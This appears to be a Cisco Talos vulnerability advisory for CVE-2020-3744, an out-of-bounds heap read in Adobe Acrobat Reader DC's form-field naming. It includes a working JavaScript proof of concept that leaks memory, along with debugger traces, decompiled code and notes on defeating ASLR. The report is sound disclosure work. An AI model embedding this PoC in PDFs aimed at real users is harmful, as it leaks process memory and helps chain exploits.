CVE-2020-3744
Specific JavaScript code embedded in a PDF file can lead to an information leak when the document is opened in Adobe Acrobat Reader DC 2019.021.20048. With careful memory manipulation, this can lead to disclosure of sensitive information, which could be abused to bypass mitigations when exploiting another vulnerability. To trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.
Tested version: Adobe Acrobat Reader DC 2019.021.20048
CVSSv3 score: 6.8 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:H
CWE-122: Heap-based Buffer Overflow
Adobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a large user base, is usually the default PDF reader on systems, and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page, or sending them a specially crafted email attachment, can be enough to trigger this vulnerability.
Adobe Acrobat Reader DC supports JavaScript code embedded in a PDF to allow for interactive PDF forms. This gives a potential attacker the ability to precisely control memory layout and exposes additional attack surface. The JavaScript API allows new form fields to be created, and an error in calculating the length of a field name can result in out-of-bounds memory being read. The following JavaScript code triggers this vulnerability:
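// Create a form field whose name nearly fills a 0x20000-byte buffer
// and ends in a short leaf component after the dot.
this.addField( Array(0x20000-9).join("a") + "\." + "bbbb", "radiobutton", 0, [0,0,0,0] );
// Read the field name back and print its length.
var s = getNthFieldName(0);
console.println(s.length);
// Collect, as hex, every character that is not part of the original name ('a' or 'b').
var sh = "";
try{
    for(var j = 0 ; j < s.length; j++){
        if(s.charCodeAt(j) == 0x61 || s.charCodeAt(j) == 0x62 ) continue;
        sh += ""+s.charCodeAt(j).toString(16);
    }
}catch(e){}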
The above code creates a PDF form field with a specific, very long name. Then, when the field name is read back, out-of-bounds memory is leaked into the returned string, whose length is printed. Note that, in general, this won’t cause a crash, as it only reads out-of-bounds memory. Also, since the length of the returned field name is determined by null termination, no bytes will be leaked if the first byte of leaked memory happens to be null. To observe a crash, PageHeap needs to be enabled. In that case we observe the following:
(1ac8.1e8c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=52bf0ff6 ebx=0000ffff ecx=0000fff6 edx=0000ffff esi=52be1000 edi=52c49009
eip=66602e8e esp=00d9c964 ebp=00d9c998 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010203
VCRUNTIME140!memcpy+0x4e:
66602e8e f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
0:000> dd esi
52be1000 ???????? ???????? ???????? ????????
52be1010 ???????? ???????? ???????? ????????
52be1020 ???????? ???????? ???????? ????????
52be1030 ???????? ???????? ???????? ????????
52be1040 ???????? ???????? ???????? ????????
52be1050 ???????? ???????? ???????? ????????
52be1060 ???????? ???????? ???????? ????????
52be1070 ???????? ???????? ???????? ????????
0:000> dd edi
52c49009 61616161 61616161 61616161 61616161
52c49019 61616161 c0616161 c0c0c0c0 c0c0c0c0
52c49029 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49039 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49049 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49059 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49069 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49079 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0:000> ?ecx
Evaluate expression: 65526 = 0000fff6
0:000> kv 5
# ChildEBP RetAddr Args to Child
00 00d9c968 65964583 52c49000 52be0ff7 0000ffff VCRUNTIME140!memcpy+0x4e (FPO: [3,0,2]) (CONV: cdecl) [d:\agent\_work\3\s\src\vctools\crt\vcruntime\src\string\i386\memcpy.asm @ 194]
WARNING: Stack unwind information not available. Following frames may be wrong.
01 00d9c998 65a13ff9 4c13cfe8 4c09cfe8 0001fff7 AcroForm!DllUnregisterServer+0x26d73
02 00d9c9ec 65a1308a 00d9ca9c 80010000 00000002 AcroForm!DllUnregisterServer+0xd67e9
03 00d9cab4 659a4b22 4a580fe8 00000605 c0010000 AcroForm!DllUnregisterServer+0xd587a
04 00d9cb38 658fa7a0 1d168bd8 4a580fe8 49330ff0 AcroForm!DllUnregisterServer+0x67312
The debugger output above shows a crash during a memcpy call. The crash is an access violation caused by an invalid memory read (esi points out of bounds), while edi is still valid. The counter ecx also shows that 0xfff6 bytes remain to be copied. To understand what is going on, we need to take a step back to the calling function sub_20AA4483:
if ( srcObj->_obj_type_ == eUNICODE )
{
    if ( start_offset1 < pstrend && !(copy_size & 1) )
    {
        realloc_sub_2086737B(destObj, pstrend - start_offset1 + 5);
        *destObj->strbuf = 0xFE;
        destObj->strbuf[1] = 0xFF;
        destObj->current_length = copy_size + 2;
        memcpy(destObj->strbuf + 2, &srcObj->strbuf[start_offset], copy_size);
        memset(&destObj->strbuf[destObj->current_length], 0, 2u);
    }
}
else
{
    realloc_sub_2086737B(destObj, pstrend - start_offset1 + 2);
    destObj->current_length = copy_size;
    memcpy(destObj->strbuf, &srcObj->strbuf[start_offset], copy_size);
    memset(&destObj->strbuf[destObj->current_length], 0, 1u);
}
In the above, we can see that if the string type is not unicode, the code reallocates the necessary memory buffer in the destination object, then uses memcpy to copy the source string into it, and even properly null terminates it. Two variables influence this vulnerable memcpy call: start_offset and copy_size. Both are influenced by this function’s arguments. Taking one step back to the calling function reveals the following simplified code of function sub_20B53CC7:
dotOffset = memchar__sub_20AA38A7(srcObj, '.', 1);
if ( dotOffset == -1 ){...}
else
{
    ...
    sub_20AA4483(dstObj, srcObj, 0, dotOffset);
    ...
    sub_20AA4483(dstObj, srcObj, dotOffset + 1, 0xFFFF);
}
In the above, we see two consecutive calls to function sub_20AA4483, which ends up calling memcpy in a vulnerable way. But first, we see a call to a memchr-like function that searches the source string for a . character. This is significant because the Adobe AcroForms specification tells us that forms and fields can form hierarchy trees, which can be represented by .-delimited names. Function sub_20B53CC7 is actually recursively walking the field name and splitting it at the dots. This matters for the vulnerability because the last call to sub_20AA4483, which processes the leaf part of the field name, has a correct dot offset but a constant size parameter of 0xFFFF. These two end up affecting our variables start_offset (which is the dot offset plus one, the first byte after the dot) and copy_size (which depends on the bytes copied so far AND the constant 0xFFFF).
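The call pattern described above can be modeled in a few lines of plain JavaScript. This is only a sketch under stated assumptions: planCopies and LEAF_COPY_SIZE are hypothetical names, the model handles a single dot rather than the full recursion, and it treats the fourth argument of sub_20AA4483 as a requested size. It shows that, for the PoC's field name, the leaf copy starts at offset 0x1fff7 and asks for 0xFFFF bytes even though only 4 bytes of name remain.

```javascript
// Hypothetical model of the two calls made for a dotted field name.
// Names and structure are illustrative, not recovered from the binary.
const LEAF_COPY_SIZE = 0xFFFF; // constant size passed for the leaf component

function planCopies(fieldName) {
  const dotOffset = fieldName.indexOf(".");
  if (dotOffset === -1) {
    return []; // the no-dot branch is elided in the decompiled code
  }
  return [
    { startOffset: 0, requestedSize: dotOffset },                   // parent part
    { startOffset: dotOffset + 1, requestedSize: LEAF_COPY_SIZE },  // leaf part
  ];
}

// Same expression as in the PoC: Array(n).join("a") yields n - 1 characters.
const pocName = Array(0x20000 - 9).join("a") + "\." + "bbbb";
const copies = planCopies(pocName);
const leafLength = pocName.length - copies[1].startOffset;

console.log(copies[1].startOffset.toString(16)); // 1fff7
console.log(leafLength);                         // 4
```

The mismatch between the 4 bytes actually left in the name and the 0xFFFF bytes requested is what the rest of the analysis follows down to the memcpy call.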
Additionally, string representation in memory in this case is as follows:
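struct fname_string {
    int obj_type;          /* unicode vs ANSI */
    char *strbuff;         /* start of the string data */
    size_t current_length; /* bytes of the buffer currently in use */
    size_t buffer_size;    /* total size of the allocation */
};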
The object type distinguishes unicode from ANSI strings, strbuff points to the beginning of the string, buffer_size is the total size of the memory allocation, and current_length represents how much of that buffer is currently in use. When we examine one of those objects in memory, we see:
0:000> dd 4c09cfe8
4c09cfe8 00000001 52bc1000 0001fffb 00020000
4c09cff8 00000000 00000000 ???????? ????????
4c09d008 ???????? ???????? ???????? ????????
4c09d018 ???????? ???????? ???????? ????????
4c09d028 ???????? ???????? ???????? ????????
4c09d038 ???????? ???????? ???????? ????????
4c09d048 ???????? ???????? ???????? ????????
4c09d058 ???????? ???????? ???????? ????????
0:000> dd 52bc1000
52bc1000 61616161 61616161 61616161 61616161
52bc1010 61616161 61616161 61616161 61616161
52bc1020 61616161 61616161 61616161 61616161
52bc1030 61616161 61616161 61616161 61616161
52bc1040 61616161 61616161 61616161 61616161
52bc1050 61616161 61616161 61616161 61616161
52bc1060 61616161 61616161 61616161 61616161
52bc1070 61616161 61616161 61616161 61616161
For the above example, 0x20000 is the total buffer size, 0x1fffb is the current string length and 0x52bc1000 is the string pointer. We can conclude that for very large strings, Acrobat allocates buffers in multiples of 0x10000 bytes, or 64 KB. Note that the constant 0xFFFF is just one byte shy of 0x10000.
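As a quick check of the sizes in this dump, the following sketch rounds the observed string length up to the next 64 KB multiple. The rounding rule is an assumption inferred from this single observation, and roundUpToChunk and CHUNK are hypothetical names; the real allocator logic may differ.

```javascript
const CHUNK = 0x10000; // 64 KB granularity inferred from the dump (assumption)

// Hypothetical helper: round a requested size up to the next multiple of CHUNK.
function roundUpToChunk(size) {
  return Math.ceil(size / CHUNK) * CHUNK;
}

const currentLength = 0x1fffb;                         // current_length from the dump
const bufferSize = roundUpToChunk(currentLength + 1);  // +1 for the null terminator
const slack = bufferSize - currentLength;              // unused bytes at the end

console.log(bufferSize.toString(16)); // 20000
console.log(slack);                   // 5
```

With only 5 unused bytes at the end of the buffer, any copy that asks for far more than the remaining string length will run past the allocation.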
Now, getting back to the vulnerable memcpy call, we need to determine where the copy_size value is calculated. This calculation happens in a couple of steps, but the most significant part is in function sub_208720F2, which calculates an offset into the string, taking the string type into account. This function returns the offset that is supposed to limit copy_size, but due to an integer overflow, a bigger value is returned. This essentially results in the constant 0xFFFF being added to the current string offset. In most cases, since large strings are allocated in multiples of 0x10000 bytes, this overflow doesn’t cause a problem, but with specially constructed field names we can force a boundary condition that leads to up to 0xFFFE bytes being read out of bounds. The string constructed in our PoC does just that:
Array(0x20000-9).join("a") + "\." + "bbbb"
It makes sure a 0x20000-byte chunk of memory is allocated, but leaves it almost full. If we break just before the memcpy call, we can inspect its parameters:
eax=52128ff7 ebx=0000ffff ecx=65727471 edx=00000040 esi=4b784fe8 edi=4b888fe8
eip=6596457e esp=0053c86c ebp=0053c894 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
AcroForm!DllUnregisterServer+0x26d6e:
6596457e e8aaa8dbff call AcroForm+0x5ee2d (6571ee2d)
0:000> kv 4
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0053c894 65a13ff9 4b784fe8 4b888fe8 0001fff7 AcroForm!DllUnregisterServer+0x26d6e
01 0053c8e8 65a1308a 0053c998 80010000 00000002 AcroForm!DllUnregisterServer+0xd67e9
02 0053c9b0 659a4b22 4915cfe8 00000605 c0010000 AcroForm!DllUnregisterServer+0xd587a
03 0053ca34 658fa7a0 1c20abd8 4915cfe8 4910cff0 AcroForm!DllUnregisterServer+0x67312
0:000> dd esp
0053c86c 52241000 52128ff7 0000ffff 4b784fe8
0053c87c 00010000 0000000d c0010000 4b784fe8
0053c88c 0001fff7 0002fff6 0053c8e8 65a13ff9
0053c89c 4b784fe8 4b888fe8 0001fff7 0000ffff
0053c8ac c0010000 0000000b 00000056 c0010000
0053c8bc 0000000d 0000000b c0010000 491d4fb0
0053c8cc 491d4fb0 670544f0 00000013 80010000
0053c8dc 0001fff6 4b784fe8 00000014 0053c9b0
The first parameter, destination buffer, is big enough:
0:000> !heap -p -a poi(esp)
address 52241000 found in
_DPH_HEAP_ROOT @ 761000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
4f1b39f4: 52241000 20000 - 52240000 22000
6e79abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
6e79b07e verifier!AVrfDebugPageHeapReAllocate+0x0000021e
77d3316c ntdll!RtlDebugReAllocateHeap+0x0000003c
77cdf2f2 ntdll!RtlpReAllocateHeapInternal+0x0004c992
77c92953 ntdll!RtlReAllocateHeap+0x00000043
77552620 ucrtbase!_realloc_base+0x00000030
66f5b442 AcroRd32!AcroWinMainSandbox+0x0001db72
657279ba AcroForm!PlugInMain+0x0000769a
65727451 AcroForm!PlugInMain+0x00007131
65964570 AcroForm!DllUnregisterServer+0x00026d60
65a13ff9 AcroForm!DllUnregisterServer+0x000d67e9
65a1308a AcroForm!DllUnregisterServer+0x000d587a
659a4b22 AcroForm!DllUnregisterServer+0x00067312
658fa7a0 AcroForm!hb_ot_tag_to_language+0x00058b90
0:000> ?poi(esp+4) - 52109000
Evaluate expression: 131063 = 0001fff7
The second parameter, the source pointer, already starts at a large offset from the beginning of its buffer (0x0001fff7), and that buffer is of the same size:
0:000> !heap -p -a poi(esp+4)
address 52128ff7 found in
_DPH_HEAP_ROOT @ 761000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
4ecb2c30: 52109000 20000 - 52108000 22000
unknown!fillpattern
6e79abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
6e79b07e verifier!AVrfDebugPageHeapReAllocate+0x0000021e
77d3316c ntdll!RtlDebugReAllocateHeap+0x0000003c
77cdf2f2 ntdll!RtlpReAllocateHeapInternal+0x0004c992
77c92953 ntdll!RtlReAllocateHeap+0x00000043
77552620 ucrtbase!_realloc_base+0x00000030
66f5b442 AcroRd32!AcroWinMainSandbox+0x0001db72
657279ba AcroForm!PlugInMain+0x0000769a
65727451 AcroForm!PlugInMain+0x00007131
65727723 AcroForm!PlugInMain+0x00007403
657276d4 AcroForm!PlugInMain+0x000073b4
65a12f1f AcroForm!DllUnregisterServer+0x000d570f
659a4b22 AcroForm!DllUnregisterServer+0x00067312
658fa7a0 AcroForm!hb_ot_tag_to_language+0x00058b90
And finally, the size of the copy is 0xFFFF.
0:000> ?poi(esp+8)
Evaluate expression: 65535 = 0000ffff
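Executing this memcpy call results in 0xFFF6 bytes being read out of bounds into the destination string: only 9 bytes remain between the source pointer and the end of its 0x20000-byte buffer, which matches the value of ecx at the faulting instruction in the crash shown earlier. This destination string is later used as part of a field name and can be inspected via JavaScript, thus leaking heap metadata.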
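The size of the out-of-bounds read can be recomputed from the values in the debugger output. The sketch below is plain arithmetic on those addresses, with variable names chosen for illustration only. It assumes the page heap's UserAddr and UserSize describe the whole source buffer.

```javascript
// Values taken from the debugger output above (page heap enabled).
const blockStart = 0x52109000; // UserAddr of the source allocation
const blockSize = 0x20000;     // UserSize of the source allocation
const srcPointer = 0x52128ff7; // second memcpy argument, poi(esp+4)
const copySize = 0xffff;       // third memcpy argument, poi(esp+8)

const srcOffset = srcPointer - blockStart;
// Bytes that can be read before running off the end of the allocation.
const inBounds = Math.max(0, Math.min(copySize, blockSize - srcOffset));
const outOfBounds = copySize - inBounds;

console.log(srcOffset.toString(16));   // 1fff7
console.log(inBounds);                 // 9
console.log(outOfBounds.toString(16)); // fff6
```

With these inputs the result is 0xfff6, the same value ecx holds at the faulting rep movs instruction in the first crash dump, where 9 bytes had already been copied before esi reached the end of the buffer.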
By carefully controlling the allocations made before and after the source string, we can place other sensitive process information in a suitable memory position and then leak it through this vulnerability. This can be used to break ASLR and other mitigations.
2019-11-26 - Vendor Disclosure
2020-02-11 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.